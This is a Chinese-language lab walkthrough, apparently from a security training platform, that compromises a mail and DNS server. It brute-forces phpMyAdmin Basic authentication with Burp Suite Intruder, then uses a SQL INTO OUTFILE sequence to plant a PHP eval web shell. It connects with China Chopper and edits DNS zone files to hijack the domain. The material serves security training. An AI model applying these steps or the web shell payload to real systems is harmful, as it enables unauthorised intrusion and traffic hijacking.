实验步骤一
实验中提供了一台邮件服务器,该服务器同时提供DNS服务,测试者通过入侵到该服务器,修改DNS服务中的正向解析与反向解析文件实现劫持。
首先我们打开 ,看到一个邮件登录入口。
这里我们先使用burpsuite对该站点进行目录扫描。
1、配置好IE代理,截取数据包。
2、右键sendtospider。
3、发现存在phpmyadmin。如果未出现请单击Filter将Hide empty folders(隐藏空文件夹)的勾去掉。
4、然后在地址栏添加phpmyadmin,如图:
5、接下来对phpmyadmin进行暴力破解,随便输入一个用户名和密码,比如此处我输入:用户名:root密码:123,页面提示错误,然后查看burpsuite截获到的数据包。
6、找到Authorization,选中Basic后边的字符串,进行如下步骤:右键convertselection->base64->base64-decode。
7、可以看到刚才输入的用户名和密码。
8、右键sendtointruder,在Positions选项卡下单击clear$。
9、选中root:123,单击add$。
10、切换到payloads选项卡下,设置payloadtype,在add处添加用户名,separatorforposition1处添加一个冒号。
11、加载桌面上一个密码字典pass.txt,配置如下。
12、配置payloadprocessing,如下图:
13、去掉payloadencoding中的对号。
14、单击intruder下的startattack,一段时间后,发现了一个length和其他的不同。
15、双击打开,复制红色区域的字符串。
16、粘贴在decoder下,选择decodeasbase64,可以看到用户名密码为root:1234567890,登录。
实验步骤二
17、接下来需要知道网站的路径是什么,一般网站搭建好后都会存在info.php,phpinfo.php,php_info.php等测试文件,一一访问下,发现存在phpinfo.php文件,并得知网站目录为C:/xampp/xampp/htdocs。
18、此时需要通过phpmyadmin拿这个站点的shell,选择SQL,输入如下命令,点击执行:
usemysql; //使用Mysql数据库
CreateTABLEheetian(heetian1textNOTNULL);//创建heetian表,heetian1字段
InsertINTOheetian(heetian1)VALUES('<?php@eval($_POST[pass]);?>');//在heetian表中的heetian1字段中添加值为一句话
selectheetian1fromheetianintooutfile'C:/xampp/xampp/htdocs/test.php';//使用Mysql中outfile函数将其导出到test.php
DropTABLEIFEXISTSheetian;//删除heetian表
返回结果如下:
19、执行成功,访问下/test.php。
20、发现返回空白页面,接下来用中国菜刀连接一下。
21、接下来我们需要对这台服务器进行域名劫持,将其劫持到一台IP为10.1.1.253的主机上,找到C:\WINDOWS\system32\dns\etc中的.zone和10.1.1.zone。
22、分别对这两个文件进行编辑,保存。
23、右键“虚拟终端”。
24、重启下dns服务,输入命令:netstopnamed和netstartnamed,回车。
25、刷新 ,发现劫持成功。页面会显示为:“欢迎来到合天网安实验室!”